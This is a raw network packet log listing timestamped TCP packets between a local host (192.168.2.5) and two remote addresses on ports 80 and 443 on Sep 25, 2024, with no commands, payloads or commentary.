                                                Sep 25, 2024 18:50:06.887227058 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.887240887 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.887243032 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.887259960 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.887275934 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.887291908 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.887295008 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.887295961 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.887307882 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.887295961 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.887350082 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.887350082 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.887376070 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.887789965 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.887824059 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.887839079 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.887855053 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.887866020 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.887890100 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.887897968 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.887916088 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.887932062 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.887945890 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.887949944 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.887960911 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.887979031 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.887998104 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.888088942 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.888103008 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.888118982 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.888134003 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.888150930 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.888164997 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.888183117 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.888185024 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.888185024 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.888204098 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.888206005 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.888225079 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.888259888 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.888806105 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.888823986 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.888854027 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.888868093 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.888884068 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.888900042 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.888889074 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.888919115 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.888889074 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.888958931 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.888958931 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.889024019 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.889030933 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.889048100 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.889064074 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.889079094 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.889090061 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.889095068 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.889111996 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.889113903 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.889127970 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.889146090 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.889147997 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.889157057 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.889192104 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.889445066 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.889683008 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.889739990 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.889944077 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.889944077 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.012940884 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.012979031 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.012996912 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.013010979 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.013027906 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.013041973 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.013067007 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.013082981 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.013092995 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.013098955 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.013113976 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.013134003 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.013134956 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.013134956 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.013149977 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.013169050 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.013175011 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.013186932 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.013190985 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.013204098 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.013209105 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.013230085 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.013257027 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.013267994 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.013283968 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.013305902 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.013313055 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.013334036 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.013382912 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.013396978 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.013412952 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.013437033 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.013453960 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.013468981 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.013514042 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.013514042 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.013514042 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.013520002 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.013560057 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.013573885 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.013576984 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.013576984 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.013608932 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.013645887 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.013660908 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.013679981 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.013689041 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.013691902 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.013709068 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.013711929 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.013725996 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.013736010 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.013742924 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.013756037 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.013762951 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.013787985 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.013881922 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.013922930 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.013926983 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.013938904 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.013967991 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.013978958 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.014007092 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.014024019 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.014039993 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.014050007 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.014055014 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.014069080 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.014070988 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.014089108 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.014102936 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.014122963 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.014192104 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.014209032 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.014225960 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.014240026 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.014256954 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.014261961 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.014278889 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.014281034 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.014296055 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.014302969 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.014321089 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.014341116 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.014400959 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.014448881 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.014453888 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.014470100 CEST8049704104.168.32.148192.168.2.5
Sep 25, 2024 18:50:07.014498949 CEST  49704  80     192.168.2.5      104.168.32.148
Sep 25, 2024 18:50:07.014517069 CEST  49704  80     192.168.2.5      104.168.32.148
Sep 25, 2024 18:50:07.014524937 CEST  49704  80     192.168.2.5      104.168.32.148
Sep 25, 2024 18:50:07.014544010 CEST  80     49704  104.168.32.148   192.168.2.5
Sep 25, 2024 18:50:07.014559031 CEST  80     49704  104.168.32.148   192.168.2.5
Sep 25, 2024 18:50:07.014576912 CEST  80     49704  104.168.32.148   192.168.2.5
Sep 25, 2024 18:50:07.014588118 CEST  49704  80     192.168.2.5      104.168.32.148
Sep 25, 2024 18:50:07.014594078 CEST  80     49704  104.168.32.148   192.168.2.5
Sep 25, 2024 18:50:07.014602900 CEST  49704  80     192.168.2.5      104.168.32.148
Sep 25, 2024 18:50:07.014622927 CEST  49704  80     192.168.2.5      104.168.32.148
Sep 25, 2024 18:50:07.014637947 CEST  49704  80     192.168.2.5      104.168.32.148
Sep 25, 2024 18:50:07.014683008 CEST  80     49704  104.168.32.148   192.168.2.5
Sep 25, 2024 18:50:07.014698029 CEST  80     49704  104.168.32.148   192.168.2.5
Sep 25, 2024 18:50:07.014714003 CEST  80     49704  104.168.32.148   192.168.2.5
Sep 25, 2024 18:50:07.014725924 CEST  49704  80     192.168.2.5      104.168.32.148
Sep 25, 2024 18:50:07.014729023 CEST  80     49704  104.168.32.148   192.168.2.5
Sep 25, 2024 18:50:07.014741898 CEST  49704  80     192.168.2.5      104.168.32.148
Sep 25, 2024 18:50:07.014745951 CEST  80     49704  104.168.32.148   192.168.2.5
Sep 25, 2024 18:50:07.014760971 CEST  49704  80     192.168.2.5      104.168.32.148
Sep 25, 2024 18:50:07.014763117 CEST  80     49704  104.168.32.148   192.168.2.5
Sep 25, 2024 18:50:07.014775991 CEST  49704  80     192.168.2.5      104.168.32.148
Sep 25, 2024 18:50:07.014779091 CEST  80     49704  104.168.32.148   192.168.2.5
Sep 25, 2024 18:50:07.014799118 CEST  49704  80     192.168.2.5      104.168.32.148
Sep 25, 2024 18:50:07.014821053 CEST  49704  80     192.168.2.5      104.168.32.148
Sep 25, 2024 18:50:07.015805006 CEST  49704  80     192.168.2.5      104.168.32.148
Sep 25, 2024 18:50:07.018109083 CEST  80     49704  104.168.32.148   192.168.2.5
Sep 25, 2024 18:50:07.018137932 CEST  80     49704  104.168.32.148   192.168.2.5
Sep 25, 2024 18:50:07.018158913 CEST  80     49704  104.168.32.148   192.168.2.5
Sep 25, 2024 18:50:07.018181086 CEST  80     49704  104.168.32.148   192.168.2.5
Sep 25, 2024 18:50:07.018199921 CEST  49704  80     192.168.2.5      104.168.32.148
Sep 25, 2024 18:50:07.018208981 CEST  49704  80     192.168.2.5      104.168.32.148
Sep 25, 2024 18:50:07.018244028 CEST  49704  80     192.168.2.5      104.168.32.148
Sep 25, 2024 18:50:11.609334946 CEST  80     49704  104.168.32.148   192.168.2.5
Sep 25, 2024 18:50:11.609414101 CEST  49704  80     192.168.2.5      104.168.32.148
Sep 25, 2024 18:50:12.351721048 CEST  49705  443    192.168.2.5      207.241.227.240
Sep 25, 2024 18:50:12.351769924 CEST  443    49705  207.241.227.240  192.168.2.5
Sep 25, 2024 18:50:12.351847887 CEST  49705  443    192.168.2.5      207.241.227.240
Sep 25, 2024 18:50:12.361363888 CEST  49705  443    192.168.2.5      207.241.227.240
Sep 25, 2024 18:50:12.361397028 CEST  443    49705  207.241.227.240  192.168.2.5
Sep 25, 2024 18:50:12.564260006 CEST  49704  80     192.168.2.5      104.168.32.148
Sep 25, 2024 18:50:12.956882000 CEST  443    49705  207.241.227.240  192.168.2.5
Sep 25, 2024 18:50:12.956969023 CEST  49705  443    192.168.2.5      207.241.227.240
Sep 25, 2024 18:50:12.961688995 CEST  49705  443    192.168.2.5      207.241.227.240
Sep 25, 2024 18:50:12.961705923 CEST  443    49705  207.241.227.240  192.168.2.5
Sep 25, 2024 18:50:12.962395906 CEST  443    49705  207.241.227.240  192.168.2.5
Sep 25, 2024 18:50:12.978173018 CEST  49705  443    192.168.2.5      207.241.227.240
Sep 25, 2024 18:50:13.023421049 CEST  443    49705  207.241.227.240  192.168.2.5
Sep 25, 2024 18:50:13.242527008 CEST  443    49705  207.241.227.240  192.168.2.5
Sep 25, 2024 18:50:13.242547989 CEST  443    49705  207.241.227.240  192.168.2.5
Sep 25, 2024 18:50:13.242564917 CEST  443    49705  207.241.227.240  192.168.2.5
Sep 25, 2024 18:50:13.242621899 CEST  49705  443    192.168.2.5      207.241.227.240
Sep 25, 2024 18:50:13.242640972 CEST  443    49705  207.241.227.240  192.168.2.5
Sep 25, 2024 18:50:13.242660999 CEST  49705  443    192.168.2.5      207.241.227.240
Sep 25, 2024 18:50:13.242682934 CEST  49705  443    192.168.2.5      207.241.227.240
Sep 25, 2024 18:50:13.263797045 CEST  443    49705  207.241.227.240  192.168.2.5
Sep 25, 2024 18:50:13.263822079 CEST  443    49705  207.241.227.240  192.168.2.5
Sep 25, 2024 18:50:13.263895035 CEST  49705  443    192.168.2.5      207.241.227.240
Sep 25, 2024 18:50:13.263915062 CEST  443    49705  207.241.227.240  192.168.2.5
Sep 25, 2024 18:50:13.263961077 CEST  49705  443    192.168.2.5      207.241.227.240
Sep 25, 2024 18:50:13.309863091 CEST  443    49705  207.241.227.240  192.168.2.5
Sep 25, 2024 18:50:13.309887886 CEST  443    49705  207.241.227.240  192.168.2.5
Sep 25, 2024 18:50:13.309951067 CEST  49705  443    192.168.2.5      207.241.227.240
Sep 25, 2024 18:50:13.309968948 CEST  443    49705  207.241.227.240  192.168.2.5
Sep 25, 2024 18:50:13.309979916 CEST  49705  443    192.168.2.5      207.241.227.240
Sep 25, 2024 18:50:13.310004950 CEST  49705  443    192.168.2.5      207.241.227.240
Sep 25, 2024 18:50:13.349725962 CEST  443    49705  207.241.227.240  192.168.2.5
Sep 25, 2024 18:50:13.349756956 CEST  443    49705  207.241.227.240  192.168.2.5
Sep 25, 2024 18:50:13.349971056 CEST  49705  443    192.168.2.5      207.241.227.240
Sep 25, 2024 18:50:13.349993944 CEST  443    49705  207.241.227.240  192.168.2.5
Sep 25, 2024 18:50:13.350049019 CEST  49705  443    192.168.2.5      207.241.227.240
Sep 25, 2024 18:50:13.350816965 CEST  443    49705  207.241.227.240  192.168.2.5
Sep 25, 2024 18:50:13.350836039 CEST  443    49705  207.241.227.240  192.168.2.5
Sep 25, 2024 18:50:13.350888968 CEST  49705  443    192.168.2.5      207.241.227.240
Sep 25, 2024 18:50:13.350897074 CEST  443    49705  207.241.227.240  192.168.2.5
Sep 25, 2024 18:50:13.350948095 CEST  49705  443    192.168.2.5      207.241.227.240
Sep 25, 2024 18:50:13.352817059 CEST  443    49705  207.241.227.240  192.168.2.5
Sep 25, 2024 18:50:13.352837086 CEST  443    49705  207.241.227.240  192.168.2.5
Sep 25, 2024 18:50:13.352893114 CEST  49705  443    192.168.2.5      207.241.227.240
Sep 25, 2024 18:50:13.352900028 CEST  443    49705  207.241.227.240  192.168.2.5
Sep 25, 2024 18:50:13.352933884 CEST  49705  443    192.168.2.5      207.241.227.240
Sep 25, 2024 18:50:13.416244984 CEST  443    49705  207.241.227.240  192.168.2.5
Sep 25, 2024 18:50:13.416275024 CEST  443    49705  207.241.227.240  192.168.2.5
Sep 25, 2024 18:50:13.416364908 CEST  49705  443    192.168.2.5      207.241.227.240
Sep 25, 2024 18:50:13.416392088 CEST  443    49705  207.241.227.240  192.168.2.5
Sep 25, 2024 18:50:13.416435003 CEST  49705  443    192.168.2.5      207.241.227.240
Sep 25, 2024 18:50:13.436583996 CEST  443    49705  207.241.227.240  192.168.2.5
Sep 25, 2024 18:50:13.436623096 CEST  443    49705  207.241.227.240  192.168.2.5
Sep 25, 2024 18:50:13.436683893 CEST  49705  443    192.168.2.5      207.241.227.240
Sep 25, 2024 18:50:13.436697960 CEST  443    49705  207.241.227.240  192.168.2.5
Sep 25, 2024 18:50:13.436768055 CEST  49705  443    192.168.2.5      207.241.227.240
Sep 25, 2024 18:50:13.437530041 CEST  443    49705  207.241.227.240  192.168.2.5
Sep 25, 2024 18:50:13.437552929 CEST  443    49705  207.241.227.240  192.168.2.5
Sep 25, 2024 18:50:13.437612057 CEST  49705  443    192.168.2.5      207.241.227.240
Sep 25, 2024 18:50:13.437619925 CEST  443    49705  207.241.227.240  192.168.2.5
Sep 25, 2024 18:50:13.437661886 CEST  49705  443    192.168.2.5      207.241.227.240
Sep 25, 2024 18:50:13.438491106 CEST  443    49705  207.241.227.240  192.168.2.5
Sep 25, 2024 18:50:13.438514948 CEST  443    49705  207.241.227.240  192.168.2.5
Sep 25, 2024 18:50:13.438571930 CEST  49705  443    192.168.2.5      207.241.227.240
Sep 25, 2024 18:50:13.438580990 CEST  443    49705  207.241.227.240  192.168.2.5
Sep 25, 2024 18:50:13.438602924 CEST  49705  443    192.168.2.5      207.241.227.240
Sep 25, 2024 18:50:13.438632965 CEST  49705  443    192.168.2.5      207.241.227.240
Sep 25, 2024 18:50:13.439770937 CEST  443    49705  207.241.227.240  192.168.2.5
Sep 25, 2024 18:50:13.439793110 CEST  443    49705  207.241.227.240  192.168.2.5
Sep 25, 2024 18:50:13.439857006 CEST  49705  443    192.168.2.5      207.241.227.240
Sep 25, 2024 18:50:13.439870119 CEST  443    49705  207.241.227.240  192.168.2.5
Sep 25, 2024 18:50:13.439924002 CEST  49705  443    192.168.2.5      207.241.227.240
Sep 25, 2024 18:50:13.440454006 CEST  443    49705  207.241.227.240  192.168.2.5
Sep 25, 2024 18:50:13.440474033 CEST  443    49705  207.241.227.240  192.168.2.5
Sep 25, 2024 18:50:13.440530062 CEST  49705  443    192.168.2.5      207.241.227.240
Sep 25, 2024 18:50:13.440537930 CEST  443    49705  207.241.227.240  192.168.2.5
Sep 25, 2024 18:50:13.440597057 CEST  49705  443    192.168.2.5      207.241.227.240
Sep 25, 2024 18:50:13.462867022 CEST  443    49705  207.241.227.240  192.168.2.5
Sep 25, 2024 18:50:13.462894917 CEST  443    49705  207.241.227.240  192.168.2.5
Sep 25, 2024 18:50:13.462987900 CEST  49705  443    192.168.2.5      207.241.227.240
Sep 25, 2024 18:50:13.463021040 CEST  443    49705  207.241.227.240  192.168.2.5
Sep 25, 2024 18:50:13.463071108 CEST  49705  443    192.168.2.5      207.241.227.240
Sep 25, 2024 18:50:13.502868891 CEST  443    49705  207.241.227.240  192.168.2.5
Sep 25, 2024 18:50:13.502893925 CEST  443    49705  207.241.227.240  192.168.2.5
Sep 25, 2024 18:50:13.502974987 CEST  49705  443    192.168.2.5      207.241.227.240
Sep 25, 2024 18:50:13.502995968 CEST  443    49705  207.241.227.240  192.168.2.5
Sep 25, 2024 18:50:13.503057957 CEST  49705  443    192.168.2.5      207.241.227.240
Sep 25, 2024 18:50:13.503271103 CEST  443    49705  207.241.227.240  192.168.2.5
Sep 25, 2024 18:50:13.503287077 CEST  443    49705  207.241.227.240  192.168.2.5
Sep 25, 2024 18:50:13.503354073 CEST  49705  443    192.168.2.5      207.241.227.240
Sep 25, 2024 18:50:13.503365040 CEST  443    49705  207.241.227.240  192.168.2.5
Sep 25, 2024 18:50:13.503417969 CEST  49705  443    192.168.2.5      207.241.227.240
Sep 25, 2024 18:50:13.523664951 CEST  443    49705  207.241.227.240  192.168.2.5
Sep 25, 2024 18:50:13.523700953 CEST  443    49705  207.241.227.240  192.168.2.5
Sep 25, 2024 18:50:13.523780107 CEST  49705  443    192.168.2.5      207.241.227.240
Sep 25, 2024 18:50:13.523797035 CEST  443    49705  207.241.227.240  192.168.2.5
Sep 25, 2024 18:50:13.523833036 CEST  49705  443    192.168.2.5      207.241.227.240
Sep 25, 2024 18:50:13.524264097 CEST  443    49705  207.241.227.240  192.168.2.5
Sep 25, 2024 18:50:13.524287939 CEST  443    49705  207.241.227.240  192.168.2.5
Sep 25, 2024 18:50:13.524364948 CEST  49705  443    192.168.2.5      207.241.227.240
Sep 25, 2024 18:50:13.524374008 CEST  443    49705  207.241.227.240  192.168.2.5
Sep 25, 2024 18:50:13.524408102 CEST  49705  443    192.168.2.5      207.241.227.240
Sep 25, 2024 18:50:13.524513006 CEST  443    49705  207.241.227.240  192.168.2.5
Sep 25, 2024 18:50:13.524533987 CEST  443    49705  207.241.227.240  192.168.2.5
Sep 25, 2024 18:50:13.524588108 CEST  49705  443    192.168.2.5      207.241.227.240
Sep 25, 2024 18:50:13.524595976 CEST  443    49705  207.241.227.240  192.168.2.5
Sep 25, 2024 18:50:13.524643898 CEST  49705  443    192.168.2.5      207.241.227.240
Sep 25, 2024 18:50:13.525120974 CEST  443    49705  207.241.227.240  192.168.2.5
Sep 25, 2024 18:50:13.525142908 CEST  443    49705  207.241.227.240  192.168.2.5
Sep 25, 2024 18:50:13.525214911 CEST  49705  443    192.168.2.5      207.241.227.240
Sep 25, 2024 18:50:13.525223970 CEST  443    49705  207.241.227.240  192.168.2.5
Sep 25, 2024 18:50:13.525274992 CEST  49705  443    192.168.2.5      207.241.227.240
Sep 25, 2024 18:50:13.577522993 CEST  443    49705  207.241.227.240  192.168.2.5
Sep 25, 2024 18:50:13.577553988 CEST  443    49705  207.241.227.240  192.168.2.5
Sep 25, 2024 18:50:13.577636003 CEST  49705  443    192.168.2.5      207.241.227.240
Sep 25, 2024 18:50:13.577668905 CEST  443    49705  207.241.227.240  192.168.2.5
Sep 25, 2024 18:50:13.577749014 CEST  49705  443    192.168.2.5      207.241.227.240
Sep 25, 2024 18:50:13.577835083 CEST  443    49705  207.241.227.240  192.168.2.5
Sep 25, 2024 18:50:13.577856064 CEST  443    49705  207.241.227.240  192.168.2.5
Sep 25, 2024 18:50:13.577924013 CEST  49705  443    192.168.2.5      207.241.227.240
Sep 25, 2024 18:50:13.577939987 CEST  443    49705  207.241.227.240  192.168.2.5
Sep 25, 2024 18:50:13.577976942 CEST  49705  443    192.168.2.5      207.241.227.240
Sep 25, 2024 18:50:13.578349113 CEST  443    49705  207.241.227.240  192.168.2.5
Sep 25, 2024 18:50:13.578366995 CEST  443    49705  207.241.227.240  192.168.2.5
Sep 25, 2024 18:50:13.578416109 CEST  49705  443    192.168.2.5      207.241.227.240
Sep 25, 2024 18:50:13.578428030 CEST  443    49705  207.241.227.240  192.168.2.5
Sep 25, 2024 18:50:13.578480959 CEST  49705  443    192.168.2.5      207.241.227.240
Sep 25, 2024 18:50:13.590018988 CEST  443    49705  207.241.227.240  192.168.2.5
Sep 25, 2024 18:50:13.590049028 CEST  443    49705  207.241.227.240  192.168.2.5
Sep 25, 2024 18:50:13.590115070 CEST  49705  443    192.168.2.5      207.241.227.240
Sep 25, 2024 18:50:13.590152025 CEST  443    49705  207.241.227.240  192.168.2.5
Sep 25, 2024 18:50:13.590177059 CEST  49705  443    192.168.2.5      207.241.227.240
Sep 25, 2024 18:50:13.590198994 CEST  49705  443    192.168.2.5      207.241.227.240
Sep 25, 2024 18:50:13.610879898 CEST  443    49705  207.241.227.240  192.168.2.5
Sep 25, 2024 18:50:13.610907078 CEST  443    49705  207.241.227.240  192.168.2.5
Sep 25, 2024 18:50:13.610996008 CEST  49705  443    192.168.2.5      207.241.227.240
Sep 25, 2024 18:50:13.611027956 CEST  443    49705  207.241.227.240  192.168.2.5
Sep 25, 2024 18:50:13.611088991 CEST  49705  443    192.168.2.5      207.241.227.240
Sep 25, 2024 18:50:13.611289978 CEST  443    49705  207.241.227.240  192.168.2.5
Sep 25, 2024 18:50:13.611306906 CEST  443    49705  207.241.227.240  192.168.2.5
Sep 25, 2024 18:50:13.611377001 CEST  49705  443    192.168.2.5      207.241.227.240
Sep 25, 2024 18:50:13.611388922 CEST  443    49705  207.241.227.240  192.168.2.5
Sep 25, 2024 18:50:13.611424923 CEST  49705  443    192.168.2.5      207.241.227.240
Sep 25, 2024 18:50:13.611932039 CEST  443    49705  207.241.227.240  192.168.2.5
